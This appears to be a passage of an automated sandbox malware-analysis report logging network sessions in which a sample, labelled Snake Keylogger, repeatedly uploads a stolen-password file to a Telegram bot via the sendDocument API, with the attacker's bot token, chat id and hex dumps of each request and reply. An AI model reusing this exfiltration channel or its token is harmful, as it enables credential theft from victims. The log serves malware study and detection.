                            Date: Sun, 26 Jun 2022 07:34:34 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:34 UTC453INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67053,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228874,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            269192.168.2.550200149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:34 UTC454OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757199ba0d3
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:34 UTC454OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 39 62 61 30 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757199ba0d3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:34 UTC455INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:34 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:34 UTC455INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67054,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228874,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            27192.168.2.549795149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:49 UTC45OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756dad82d11
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:49 UTC45OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 61 64 38 32 64 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756dad82d11Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:49 UTC46INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:49 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:49 UTC46INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66774,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228769,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            270192.168.2.550203149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:35 UTC455OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575719d99d79
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:35 UTC456OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 64 39 39 64 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575719d99d79Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:35 UTC456INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:35 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:35 UTC457INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67055,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228875,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            271192.168.2.550205149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:35 UTC457OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571a0e113a
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:35 UTC457OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 30 65 31 31 33 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571a0e113aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:35 UTC458INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:35 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:35 UTC458INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67056,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228875,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            272192.168.2.550206149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:35 UTC459OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571a4c0e67
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:35 UTC459OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 34 63 30 65 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571a4c0e67Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:36 UTC460INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:36 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:36 UTC460INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67057,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228876,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            273192.168.2.550207149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:36 UTC461OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571a87aa22
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:36 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 38 37 61 61 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571a87aa22Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:36 UTC461INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:36 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:36 UTC462INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67058,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228876,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            274192.168.2.550208149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:36 UTC462OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571ac5a604
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:36 UTC463OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 61 63 35 61 36 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571ac5a604Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:36 UTC463INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:36 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:36 UTC463INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
